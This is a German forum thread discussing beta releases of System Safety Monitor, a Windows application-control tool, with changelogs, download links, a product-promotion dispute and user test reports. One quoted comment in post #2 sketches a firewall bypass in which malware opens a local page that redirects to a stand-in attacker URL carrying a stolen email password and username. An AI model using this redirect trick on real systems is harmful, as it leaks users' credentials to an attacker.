System Safety Monitor (SSM) *1.9.4 beta 1*

#1 Hi

Vom absolut genialen Tool System Safety Monitor (SSM) ist eine neue Version erschienen. SSM ist die sinnvolle Ergänzung für jede Firewall. Damit sind auch hinterhältige Trojaner-Tricks - wie DLL/Code Injection - aufdeckbar. Zusammen mit der Kerio Personal Firewall 4 Beta4 kann ich alle mir bekannten Leak-Tests bestehen. Probiert's doch selber aus: http://perso.wanadoo.fr/jugesoftware/firewallleaktester/eng/pageweb/test.html Eigentlich unverständlich, dass dieses Tool auf diesem Board noch fast keine Erwähnung gefunden hat. Wir sind doch alles Paranoiker ;-)

Zitat

Hello.

New version of SSM (1.9.3 beta 2) was released. In this new version:

* Config files from previous version now became incompatible (you can convert
your config file to new version using special utility)
* New: "MD5 instead of CRC16 checksums are used now"
* New: "Applications database service functions added, allowing your to
remove/update non-actual entries automatically"
* New: "SSM Service Guard (for NT) is now available (as a plug-in
application)"
* New: "1-5 numpad keys are now accepted as well as F1-F5 in Application
Activity Dialog"
* New: "Option to enable strict Parent-Process-Child-Process-pair watching by
default."
* Fixed: (too many bugs to remember)
* Fixed: "9x support improved"
* Fixed: "Command-line parsing bugs"
* Fixed: "Security vulnerabilities in handling NtOpenThread,SetWindowsHookEx and DebugActiveProcess"
* New: "Advanced process manipulation tools" (under construction)
* New: "Storing the log of registry changes and application activity notifications"
* New: "Context menus added for almost all lists"
* New: "Highlighting of unclassified applications in the list of running processes"
* New: "Option to treat ESC key as F5 in Application Activity dialog"


For 9x users:
You will need to uninstall SSM and restart your computer to proceed with update.

IMPORTANT: Config files from previous SSM version are incompatible with new one.
You can use a converter located here: http://mc.webm.ru/convert_v7tov8.exe

SSM:
http://kormushkin.narod.ru/ssm.zip
http://mc.webm.ru/ssm.zip

Language modules (including French)
http://maxcomputing.narod.ru/locales_ssm.zip

Quelle: vlintstoun

Greetz Lp

#2

Zitat

Personalfirewalls und Sandboxen etc. funktionieren nicht.

Bösesprogramm kann ne lokale Website erstellen und mit dem Browser starten. Inhalt Refresh=0 mit Link
http://boese.domain/evil.php?emailpasswort=geklaut&username=hurz
und das ist nur ein primitives Bsp.

Wenn Sandbox dann Vmware oder Bochs und Netzwerkverbindung unterbrechen.

ein netter Kommentar zu solchen Programmen, obwohl sie sicherlich trotzdem sinnvoll sind und gegen eine Menge Spyware schützen....

Greetz Lp

#3

Zitat

Eigentlich unverständlich, dass dieses Tool auf diesem Board noch fast keine Erwähnung gefunden hat.

Erstmals wurde das Tool glaube ich am 08.05.2002 vorgestellt.

http://board.protecus.de/t378.htm

Gruß
Ajax

#4

Zitat

Bösesprogramm kann ne lokale Website erstellen und mit dem Browser starten.

Und genau dies soll (und kann i.d.R.) eine Sandbox wie SSM ja verhindern... von daher ist die Aussage imho etwas 'unpassend.'
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#5 BTW: wie es dazu kam, dass SSM statt der unsicheren CRC32-Prüfsumme neuerdings MD-5 verwendet...

http://www.dslreports.com/forum/remark,7884329~root=security,1~mode=flat;start=60

Aus persönlicher Erfahrung kann ich bestätigen, dass die SSM-Autoren auch sonst sehr offen für Vorschläge aller Art sind.
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#6 System Safety Monitor interessantes Programm. Ich als Programmierer bin mir aber sicher, dass das ganz schön auf die Systemperformance geht. Und 100% klappen kann das auch nicht immer (steht ja auch so auf der Homepage).

Ich empfehle da lieber immer den Security Task Manager. Auch für diesen trifft das zu was Laserpointa zu SSM gepostet hat: "...ist die sinnvolle Ergänzung für jede Firewall. Damit sind auch hinterhältige Trojaner-Tricks - wie DLL/Code Injection - aufdeckbar." Und dieses Tool wurde im Board noch nie erwähnt.

Tschüsss
Alex

#7 > Und dieses Tool wurde im Board noch nie erwähnt.
Was wahrscheinlich keine Absicht war... ;-)

Allerdings könntest du auch erwähnen, dass
1. der STM von dir ist
und
2. er 29 Euro kostet.

#8 @Alex

Zitat

System Safety Monitor interessantes Programm. Ich als Programmierer bin mir aber sicher, dass das ganz schön auf die Systemperformance geht. Und 100% klappen kann das auch nicht immer (steht ja auch so auf der Homepage).

Hast Du als Programmierer die Software worüber Du sprichst auch mal getestet?
Deine Befürchtungen(Erfahrungen?) mit SSM kann ich jedenfalls mit einen PentiumII nicht bestätigen

Zitat

Ich empfehle da lieber immer den Security Task Manager.

Ehrlich gesagt,hört sich ziemlich plump an.Es sind nicht unbedingt die Argumente welche man von einen Programmierer erwartet der seine Software verkaufen möchte

SSM ist eine Systemfirewall die vor dem Ausführen von (schädlichen) Code warnt und es auch verhindern vermag.
STM scheint ein Task Manager zu sein der (schädlichen) Code nur erkennt.
Auf der Homepage sehe ich keinen Hinweis auf Einstellungsmöglichkeiten die vor dem Ausführen von (schädlichen) Code warnen und es verhindern.
Falls diese Optionen fehlen wäre ein Vergleich mit SSM schwachsinnig.
Sollten diese Fuktionen in STM aber implementiert sein,so wäre ein Hinweis auf der Home Page oder hier im Forum,der richtige Weg Aufmerksamkeit für dein Produkt zu erzielen

Gruß
Ajax

#9 Hallo Ajax & Toska, ich wollte den SSM nicht schlecht machen. Wirklich nicht. Da ich mich aber auch mit solchen Dingen als Programmierer (u.a. von STM) beschäftig habe, weiß ich welche Möglichkeiten (bzw. Tricks) es gibt sowas wie den SSM zu programmieren. WindowsNT (W2k, XP) ist ja so ausgelegt, dass kein Programm auf Code+Daten eines anderen Programms draufzugreifen kann. (Win9x eigentlich auch - etwas). Und das aus gutem Grund. Und der heißt Stabilität. Sonst wären wir ja wieder bei Windows 3.1. (Hier für die Techniker: Es gibt im Prinzip drei Tricks das auszuhebeln: Hooks, KnownDlls, DebugModus. Alle 3 Methoden haben irgendeinen entscheidenen Haken). SSM untersucht auch (oder nur) die Programm.exe vor dem Start und vergleicht den Hash-Wert wohl mit dem vom letzten Start. Logischerweise dauert das Einlesen der Datei+ Hash-Wert-Berechnung etwas Zeit. Die ist sicherlich bei guten Festplatten vernachlässigbar. Auch kann ich mir gut vorstellen das der SSM im praktischem Dienst sehr gut lauft.
Ja, der Security Task Manager ist von mir (ich denke auch, das geht aus meinem Posting auch hervor). Ajax hat recht, der STM ist eher als Analysewerkzeug zu verstehen. Er ist auch nicht Datenbank basierend wie fast alle anderen Programme im Bereich Spyware/Adware. Ziel war es Prozesse & Dienste anhand typischer Spyware/Trojaner Merkmale zu erkennen. Ob das mir gelungen ist, müßt ihr entscheiden. Für Anregungen & Kritik bin ich (genau wie die Macher von SSM) immer dankbar.

Tschüss
Alex

PS: Vielleicht auch für Euch interessant: http://www.snoopfree.com/PrivacyShield.htm . Auch ein Firewall für Programme, aber nur für XP und sehr instabil (deshalb auch meine Zweifel an SSM).

#10 System Safety Monitor 1.9.4 beta 1

Zitat

* Config files from previous version now became incompatible
* New: "General monitoring plug-ins available. WARNING: plug-ins were not tested enough"
* New: "Single SetWindowsHookEx rule for any hook type is now used"

For 9x users:
If you experiencing an "Access Violation"/"Runtime error"/BSOD or other kinds of crashes when SSM starts, or when you want to run another application or acceess some menus, please report this to author. You may also delete mchook9x.dll (in this case, functionality of Application watching will be seriously limited).
For 9x users:
You will need to uninstall SSM and restart your computer to proceed with update.

Da die Vorgängerversionen abgelaufen sind gibt es die neue Version.
Die aktuelle Version ist bis Dezember 2004 lauffähig.

http://kormushkin.narod.ru/ssm.zip
oder
http://mcom.fatal.ru/ssm.zip
oder
http://perso.wanadoo.fr/jugesoftware/ssm.zip

Gruß
Ajax

#11 hmm ich fasse mal zusammen was ich lese:

1.geniales tool
2.jede menge bugs gefixt, soviel das man sich nicht erinnert...
3.pentium III scheint probleme damit zu haben...
4.kostet 29 euro
5.ich lade gerade 534kb runter, 1.42 MB entpackt...bin ja mal gespannt.

aber besser als nix allemal
die sache mit der code injection hört sich gut an, werd ich mal testen...auf meinem pII 400 *bg*

gruss coder

#12 SSM ist vom Konzept her wirklich sehr genial!! - liegt leider auf einem sehr sehr langsamen Server... - aber das Programm ist ja auch nicht all zu gross

@coder eine sache muss ich korrigeren:
SSM ist kostenlos!
__________
Gruß Lukas

#13 ups dann habe ich das in der eile übersehen, sorry wegen dem kostenlos/29 euro...

also habe das soeben auf nem 400er getestet.
ergebniss :

zurst ein wenig entäuscht, halt taskmanager,dann windows handles...
ein wenig unübersichtlich finde ich, halt viele knöpfe...für den 'normalen' user sicher alles was kompliziert.

dann habe ich das überwachen der startleiste eingestellt...zack...2 fehlermeldungen.

da die ssm.exe leider im vordergrund im vollbild lief, man kann kein anderes fenster incl. den fehlermeldungen sehen...muste ich die dann aus dem speicher killen...

ergebniss: die dlls laufen ja weiter und erstmal nix mehr mit startleiste, dann auch nix mit dfü verbindung öffnen...also 'reset' und hier bin ich wieder.

also der coder sollte beim öffnen der messagebox folgendes machen:
in asm würde er das so machen:
call messagebox,0,text usw.....

die 0 ist der fehler...er muss da den wert von seinem dialog angeben.
den fehler hatte ich am anfang auch gemacht und dann dumm geschaut als ich meine fehlermeldungen nicht sehen konnten,weil die hinter meinem programm auftauchen und man nicht wechseln konnte

seh mir morgen den rest mal an, konnte ja nix weiter testen.

gruss coder